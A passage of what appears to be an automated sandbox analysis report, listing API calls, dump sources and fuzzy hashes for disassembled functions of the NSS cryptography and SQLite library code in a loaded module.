                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9510BB2E902109FEB509F66DC44AAB77B8EF4630CB25402DDC5997B02EF31D945C6A1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000,6CEA1444,?,00000001,?,00000000,00000000,?,?,6CEA1444,?,?,00000000,?,?), ref: 6CEA0CB3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CEA1444,?,00000001,?,00000000,00000000,?,?,6CEA1444,?), ref: 6CEA0DC1
                                                                                                                                                                                                                                                                                                                      • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CEA1444,?,00000001,?,00000000,00000000,?,?,6CEA1444,?), ref: 6CEA0DEC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CE62AF5,?,?,?,?,?,6CE60A1B,00000000), ref: 6CEC0F1A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0F10: malloc.MOZGLUE(00000001), ref: 6CEC0F30
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CEC0F42
                                                                                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CEA1444,?,00000001,?,00000000,00000000,?), ref: 6CEA0DFF
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CEA1444,?,00000001,?,00000000), ref: 6CEA0E16
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CEA1444,?,00000001,?,00000000,00000000,?), ref: 6CEA0E53
                                                                                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6CEA1444,?,00000001,?,00000000,00000000,?,?,6CEA1444,?,?,00000000), ref: 6CEA0E65
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CEA1444,?,00000001,?,00000000,00000000,?), ref: 6CEA0E79
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB1560: TlsGetValue.KERNEL32(00000000,?,6CE80844,?), ref: 6CEB157A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB1560: EnterCriticalSection.KERNEL32(?,?,?,6CE80844,?), ref: 6CEB158F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEB1560: PR_Unlock.NSS3(?,?,?,?,6CE80844,?), ref: 6CEB15B2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CE81397,00000000,?,6CE7CF93,5B5F5EC0,00000000,?,6CE81397,?), ref: 6CE7B1CB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE7B1A0: free.MOZGLUE(5B5F5EC0,?,6CE7CF93,5B5F5EC0,00000000,?,6CE81397,?), ref: 6CE7B1D2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE789E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CE788AE,-00000008), ref: 6CE78A04
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE789E0: EnterCriticalSection.KERNEL32(?), ref: 6CE78A15
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE789E0: memset.VCRUNTIME140(6CE788AE,00000000,00000132), ref: 6CE78A27
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE789E0: PR_Unlock.NSS3(?), ref: 6CE78A35
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1601681851-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 73842401a256e327eeb2d8e2da701021a5f5b773250cbe50b3c650ce209ba647
                                                                                                                                                                                                                                                                                                                      • Instruction ID: c1243e25711a756d511a56ab18698b4febd9e89e8969b627629651744eddf953
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73842401a256e327eeb2d8e2da701021a5f5b773250cbe50b3c650ce209ba647
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C251BBB6E012005FEB109FA4DC81ABB37B8DF4525CF254468EC1AAB712F731ED1586A2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6CE56ED8
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(?,?), ref: 6CE56EE5
                                                                                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CE56FA8
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(00000000,?), ref: 6CE56FDB
                                                                                                                                                                                                                                                                                                                      • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CE56FF0
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6CE57010
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_blob.NSS3(?,?), ref: 6CE5701D
                                                                                                                                                                                                                                                                                                                      • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CE57052
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1920323672-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 177421b42cf0dcd9f9a4db354be90368e21d1a2a0dd717e6f08a81d160894781
                                                                                                                                                                                                                                                                                                                      • Instruction ID: e4a9c51d6ec5032635c0aa4e1fcd06bcac09bbbc986d248ebd5d15db08975b3d
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 177421b42cf0dcd9f9a4db354be90368e21d1a2a0dd717e6f08a81d160894781
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A61C2B1E142068BDB00CFA4D8017EFB7B6AF45308FB88169D414AB751E7379C26CBA0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CEC7313), ref: 6CEC8FBB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CE68298,?,?,?,6CE5FCE5,?), ref: 6CEC07BF
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CEC07E6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC081B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC0825
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CEC7313), ref: 6CEC9012
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CEC7313), ref: 6CEC903C
                                                                                                                                                                                                                                                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CEC7313), ref: 6CEC909E
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CEC7313), ref: 6CEC90DB
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CEC7313), ref: 6CEC90F1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CEC7313), ref: 6CEC906B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CEC7313), ref: 6CEC9128
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3590961175-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 54f7a487c9131cefe61b02c8aec6a1be478c2eb6c8709d32725e1be44abb1dea
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26517071B002018FEB109F6ADE46B26B3F5AF4531CF264129D935D7B61EB31E805CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE78850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CE80715), ref: 6CE78859
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE78850: PR_NewLock.NSS3 ref: 6CE78874
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE78850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CE7888D
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CE79CAD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: calloc.MOZGLUE(00000001,00000084,6CE50936,00000001,?,6CE5102C), ref: 6CF298E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507AD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507CD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CDE204A), ref: 6CE507E4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,6CDE204A), ref: 6CE50864
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE50880
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,6CDE204A), ref: 6CE508CB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508D7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508FB
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE79CE8
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6CE7ECEC,6CE82FCD,00000000,?,6CE82FCD,?), ref: 6CE79D01
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6CE7ECEC,6CE82FCD,00000000,?,6CE82FCD,?), ref: 6CE79D38
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6CE7ECEC,6CE82FCD,00000000,?,6CE82FCD,?), ref: 6CE79D4D
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE79D70
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE79DC3
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CE79DDD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE788D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CE80725,00000000,00000058), ref: 6CE78906
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE788D0: EnterCriticalSection.KERNEL32(?), ref: 6CE7891A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE788D0: PL_ArenaAllocate.NSS3(?,?), ref: 6CE7894A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE788D0: calloc.MOZGLUE(00000001,6CE8072D,00000000,00000000,00000000,?,6CE80725,00000000,00000058), ref: 6CE78959
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE788D0: memset.VCRUNTIME140(?,00000000,?), ref: 6CE78993
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE788D0: PR_Unlock.NSS3(?), ref: 6CE789AF
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3394263606-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: d3487e8645c4e4e7cfbc492cf6e9f64e9c23a36e70198c761aae0bea5b8aa4da
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 50b2decb89fe712aae8a5e57e80ae93e0d5af6c6b37d8d291c7edbe92ca39e39
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3487e8645c4e4e7cfbc492cf6e9f64e9c23a36e70198c761aae0bea5b8aa4da
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B5161B1A057058FDB20EF68C1846AEBBF0FF45359F25852DD9989B710EB70E844CBA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CF79EC0
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CF79EF9
                                                                                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6CF79F73
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CF79FA5
                                                                                                                                                                                                                                                                                                                      • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6CF79FCF
                                                                                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6CF79FF2
                                                                                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6CF7A01D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterSection
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 1904992153-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: aa3ab900dbb9c299950203052bb8f6fb6d597aedc2310046fa3e07574b7fd0c6
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9dc7bfc0b934c3341b0c984c00a63bb140f73b01d89e45975138729de722e5e1
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa3ab900dbb9c299950203052bb8f6fb6d597aedc2310046fa3e07574b7fd0c6
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E651B5B2800600CBDB20DF25E48478AB7F4FF04319F19856AD85957B16EB35F985CBE1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CEA88FC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBBE30: SECOID_FindOID_Util.NSS3(6CE7311B,00000000,?,6CE7311B,?), ref: 6CEBBE44
                                                                                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6CEA8913
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CE687ED,00000800,6CE5EF74,00000000), ref: 6CEC1000
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PR_NewLock.NSS3(?,00000800,6CE5EF74,00000000), ref: 6CEC1016
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CE687ED,00000008,?,00000800,6CE5EF74,00000000), ref: 6CEC102B
                                                                                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6CF8D864,?), ref: 6CEA8947
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6CEBE245
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6CEBE254
                                                                                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CEA895B
                                                                                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6CEA8973
                                                                                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CEA8982
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CEA89EC
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000), ref: 6CEA8A12
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2145430656-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 94e3336c5a0b85091b726b4b1d516e7472ebc1e1e8de9588af778e1f11717eed
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 953f1bdab127780b8cb8b506b8fbae5645639395c8565dbfa6e85ba94d9295a9
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94e3336c5a0b85091b726b4b1d516e7472ebc1e1e8de9588af778e1f11717eed
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF3146B2A046805BF73042A9AC417AA36B59F8132CF34173BD91DEBB91FB31C4478297
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6CE6DCFA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CF70A27), ref: 6CF29DC6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CF70A27), ref: 6CF29DD1
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CF29DED
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CE6DD40
                                                                                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6CE6DD62
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6CE6DD71
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CE6DD81
                                                                                                                                                                                                                                                                                                                      • CERT_RemoveCertListNode.NSS3(?), ref: 6CE6DD8F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: TlsGetValue.KERNEL32 ref: 6CE806C2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: EnterCriticalSection.KERNEL32(?), ref: 6CE806D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE806A0: PR_Unlock.NSS3 ref: 6CE806EB
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6CE6DD9E
                                                                                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6CE6DDB7
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
